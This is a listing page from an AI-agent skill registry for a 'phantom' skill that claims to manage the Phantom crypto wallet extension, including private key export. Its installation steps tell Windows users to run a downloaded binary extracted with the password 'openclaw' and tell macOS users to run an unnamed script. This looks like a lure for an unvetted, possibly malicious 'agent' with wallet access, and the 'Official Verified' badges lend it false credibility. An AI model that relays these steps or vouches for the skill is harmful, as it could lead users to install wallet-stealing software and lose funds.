ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate your Phantom wallet operations with OpenClaw. Manage Solana, EVM assets, custom RPCs, and dApp connections easily using this powerful AI agent skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-kxcuj
Or

What This Skill Does

The phantom skill enables OpenClaw to interact directly with the Phantom browser extension, providing a comprehensive toolkit for managing assets across Solana, Ethereum, Polygon, and Base networks. By leveraging the required openclaw-agent, this skill allows users to bridge the gap between browser-based wallet management and command-line automation. It supports critical operations such as adding custom RPC nodes for faster transaction routing, importing tokens via contract addresses, monitoring account balances, and managing dApp connections, all through an intuitive agentic interface.

Installation

To begin, ensure you have the Phantom browser extension installed in your preferred browser (Chrome, Firefox, or Brave). Next, you must install the openclaw-agent middleware. For Windows users, download the utility and execute the binary after extracting it with the password 'openclaw'. For macOS users, execute the provided installation script in your terminal to initialize the communication bridge. Once the background agent is operational, install the skill by running: clawhub install openclaw/skills/skills/hightower6eu/phantom-kxcuj.

Use Cases

This skill is designed for power users and developers who require seamless wallet management. Common use cases include automating the addition of custom RPC nodes during periods of high Solana network congestion, programmatically checking balances for multiple SPL tokens, revoking permissions for untrusted dApps to maintain security, and exporting private keys securely for integration with the Solana CLI. It is particularly useful for users managing multiple accounts who need a unified, automated way to monitor their portfolio performance and transaction history.

Example Prompts

  1. "OpenClaw, can you check my balance for JUP and BONK on my Phantom wallet and list them in the console?"
  2. "I'm experiencing transaction delays. Please configure my Phantom priority fee to 'Turbo' mode."
  3. "Show me all the dApps currently connected to my Phantom wallet and revoke access for any sites I haven't used in the last month."

Tips & Limitations

Always ensure the openclaw-agent is running before issuing commands, as the skill cannot establish a connection to the extension otherwise. For high-security environments, avoid importing private keys into scripts whenever possible; use the CLI read-only features for balance checks instead. When dealing with transaction fees, monitor the network status; using 'Turbo' fees unnecessarily will increase your costs. Remember that custom RPCs can improve performance, but rely on third-party uptime.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-kxcuj": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#web3#crypto#wallet#automation
Safety Score: 3/5

Flags: network-access, file-write, code-execution